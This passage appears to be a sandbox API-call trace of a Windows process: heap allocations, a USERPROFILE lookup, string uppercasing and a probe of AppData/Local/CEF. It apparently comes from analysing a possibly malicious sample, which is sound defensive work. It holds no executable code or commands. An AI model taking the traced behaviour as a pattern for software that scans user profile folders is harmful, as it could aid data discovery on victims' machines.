RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0154.577] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0154.577] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68430 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a68430 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0154.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0154.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0154.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0154.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0154.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0154.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0154.580] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0154.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0154.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0154.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0154.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.582] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0154.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.584] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/CEF", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 0x9e2078 [0154.584] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0154.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0154.585] 